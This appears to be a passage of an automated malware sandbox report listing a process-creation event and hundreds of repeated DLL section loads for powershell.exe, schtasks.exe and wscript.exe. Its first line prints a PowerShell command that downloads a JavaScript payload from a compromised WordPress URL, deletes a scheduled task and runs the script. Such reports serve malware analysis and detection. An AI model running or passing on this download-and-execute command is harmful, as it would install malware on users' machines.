      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
